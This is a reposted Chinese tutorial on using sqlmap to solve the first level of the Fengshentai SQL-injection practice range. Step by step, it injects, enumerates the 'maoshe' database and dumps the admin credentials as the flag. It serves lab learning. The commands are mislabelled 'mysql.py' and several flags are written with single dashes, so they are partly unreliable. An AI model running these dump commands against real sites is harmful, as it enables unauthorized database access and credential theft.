ICode9

精准搜索请尝试: 精确搜索
首页 > 数据库> 文章详细

如何使用sqlmap破解封神台靶场第一关

2020-12-17 10:58:42  阅读:791  来源: 互联网

标签:sqlmap 神台 数据库 batch 查询 admin mysql 第一关 id


文章目录

一.查看是否有注入

使用命令 mysql.py -u http://59.63.200.79:8003/?id=1 --batch
-u指令为查看网址的url是否有漏洞。-batch为永远不要求用户输入信息,默认执行。

在的这里插入图片描述我们可以看到,存在sql注入漏洞。

二.查找当前数据库

mysql.py -u http://59.63.200.79:8003/?id=1 -current-db -batch
-cuurent-db 意思为查找当前的数据库信息,也可以用-dbs查找所有的数据库。
在这里插入图片描述

三.查询数据库的表

上面我们已知当前数据库为 maoshe,所以我们指定数据库查询表。
mysql.py -u http://59.63.200.79:8003/?id=1 -D “maoshe” -tables -batch
-D为指定数据库 -tables为查询当前数据库所在的表。
在这里插入图片描述得出查询到的当前数据库表为admin dirs news xss4个。

四.查询表中的列

一般管理员的帐号密码都会在admin里面,所以我们可以查看下admin里面的字段。
mysql.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -columns -batch
这里的-t为指定表,然后使用-columns 查看字段名称
在这里插入图片描述我们可以得知,字段名称为id,password,username三个。所以我们提取username和password就可以了。

五.查询具体内容

使用 mysql.py -u http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C “username,password” -dump -batch
这里的-C为指定字段名称,-dump代表查询出字段。
在这里插入图片描述最后我们得出admin密码为helloback,这个就是本题的flag。

标签:sqlmap,神台,数据库,batch,查询,admin,mysql,第一关,id
来源: https://blog.csdn.net/weixin_44490353/article/details/111308759

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有